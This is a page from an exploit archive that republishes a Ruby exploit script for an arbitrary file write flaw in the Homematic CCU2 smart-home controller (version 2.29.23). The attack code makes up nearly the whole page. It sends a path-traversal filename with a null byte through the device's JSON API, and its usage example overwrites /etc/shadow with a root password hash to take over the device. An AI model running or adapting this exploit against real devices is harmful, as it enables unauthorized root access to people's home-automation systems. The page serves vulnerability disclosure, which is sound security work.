Homematic CCU2 2.29.23 Arbitrary File Write

2018.03.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/ruby # Exploit Title: Homematic CCU2 Arbitrary File Write # Date: 28-03-18 # Exploit Author: Patrick Muench, Gregor Kopf # Vendor Homepage: http://www.eq-3.de # Software Link: http://www.eq-3.de/service/downloads.html?id=268 # Version: 2.29.23 # CVE : 2018-7300 # Description: http://atomic111.github.io/article/homematic-ccu2-filewrite require 'net/http' require 'net/https' require 'uri' require 'json' unless ARGV.length == 3 STDOUT.puts <<-EOF Please provide url Usage: write_files.rb <ip.adress> <file path> <content of the file> Example: write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' or write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::' EOF exit end # The first argument specifiee the URL and if http or https is used url = ARGV[0] + "/api/homematic.cgi" # The second argument specifies the file into which the content should be written homematic_file_path = ARGV[1] # The third argument specifies the content of the file homematic_file_content = ARGV[2] # define the json body for the attack body = { "version": "1.1", "method": "User.setLanguage", "params": { "userName": "file path", "userLang": "file content" } }.to_hash # define the traversal with the file you want to write body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000" # define the content body[:params][:userLang] = homematic_file_content # split the uri to access it in a easier way uri = URI.parse(url) # define target connection, disabling certificate verification Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http| # define post request request = Net::HTTP::Post.new(uri.request_uri) # define the content type of the http request request.content_type = 'application/json' # define the request body request.body = body.to_json # send the request to the homematic ccu2 response = http.request(request) # print response message code and status to cli puts 'Response code: ' + response.code + ' ' + response.message end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top